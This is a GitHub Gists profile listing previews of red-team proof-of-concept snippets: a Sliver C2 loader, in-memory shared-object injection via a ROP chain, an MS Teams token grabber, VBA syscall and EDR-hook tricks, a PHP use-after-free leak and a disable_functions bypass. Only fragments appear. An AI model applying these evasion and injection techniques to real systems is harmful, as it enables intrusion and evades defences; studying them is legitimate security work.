Skip to content

Instantly share code, notes, and snippets.

View X-C3LL's full-sized avatar

X-C3LL

185 followers · 6 following
View GitHub Profile
@X-C3LL
X-C3LL / miniloader.c
Created November 12, 2023 09:58
Minimal loader for sliver
// gcc estibador.c -o estibador -pie -fPIC
// [server] sliver > generate --http https://192.168.13.37/ --os linux --arch amd64
//Refs:
//
// https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html
// binfmt_elf.c
// http://manugarg.appspot.com/aboutelfauxiliaryvectors.html
//
@X-C3LL
X-C3LL / Description.md
Last active October 19, 2023 09:29
Load a shared object inside /usr/bin/sleep via a stack hijack + ROP chain

This is just a Proof of Concept. It does:

  1. Decrypt shared object from disk
  2. Create a new memfd using memfd_create and write the shared object on it
  3. Forks and spawns /usr/bin/sleep in the child using execve with a masked name (here /this/is/a/PoC . The path to the memfd is passed via an env var
  4. The parent reads sleep's /proc/PID/mem and search for gadgets.
  5. Also it looks for the address that would return the nanosleep call inside /usr/bin/sleep, then search for this address in the stack
  6. It uses /proc/PID/syscall to get the return address of nanosleep syscall
  7. Craft a simple ROP chain to execute dlopen(path-to-my-memfd, RTLD_NOW)
  8. Overwrite the return address in the stack
@X-C3LL
X-C3LL / hookity.py
Created December 28, 2022 15:28
Crappy script to generate signatures to be used on memdlopen
#!/usr/bin/env python3
# Author: Juan Manuel Fernandez (@TheXC3LL)
import sys
import r2pipe
import binascii
# Edit with your needs
targets = ["sym.__GI___close_nocancel", "sym.__read_nocancel", "sym.__open_nocancel", "sym.__mmap", "sym.__GI___fstat64"]
@X-C3LL
X-C3LL / msteams-token.js
Created October 23, 2022 11:02
// Obtain teams token - you can reuse it for GoMapEnum for example
// Author: Juan Manuel Fernandez (@TheXC3LL)
const puppeteer = require('puppeteer');
(async () => {
console.log("\t\tMS Teams Token Generator - @TheXC3LL\n\n");
const username = process.argv[2];
const password = process.argv[3];
console.log("[*] Using credentials: %s:%s", username, password);
@X-C3LL
X-C3LL / FreshyCalls-VBA.vba
Created September 4, 2022 23:51
Retrieving SSN for syscalling in VBA following FreshyCalls technique
' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)
'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/
Private Type LARGE_INTEGER
@X-C3LL
X-C3LL / uaf-leak.php
Created January 5, 2022 00:40
PoC BUG #81691 (PHP)
<?php
// BUG #81691 https://bugs.php.net/bug.php?id=81691
// POC: Memory Leak via Use-After-Free
//export USE_ZEND_ALLOC=0
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@X-C3LL
X-C3LL / estigmergio.py
Last active January 20, 2021 15:11
Infer prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary
#!/usr/bin/env python3
from difflib import SequenceMatcher
import sys
def words(words_file):
try:
with open(words_file, "r") as file:
@X-C3LL
X-C3LL / F-Isolation.py
Created April 9, 2020 16:46
Small script to transfer files between a VDI and host using OCR & Keyboard emulation
#!/usr/bin/python
#coding: utf-8
# F-Isolation v0.1 - F**k isolated enviroments
# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.
# OCR + Keyboard emulation FTW!
@X-C3LL
X-C3LL / disable_functions_PoC.php
Last active January 20, 2021 15:14
<?php
/*
If open_basedir is misconfigured it is posible to read and write /proc/self/mem. This means that a PHP script can self-patch
itself to bypass disable_functions and call system() or other dangerous functions. This technique is old, indeed you can find
a PoC by Beched (https://github.com/beched/php_disable_functions_bypass) where the open@plt address is replaced by the system@plt
address (the info is extraced parsing the PHP and libc binary).
My approach is similar in the sense of taking the advantage of /usr/proc/mem, but to achieve the bypass I overwrite the handler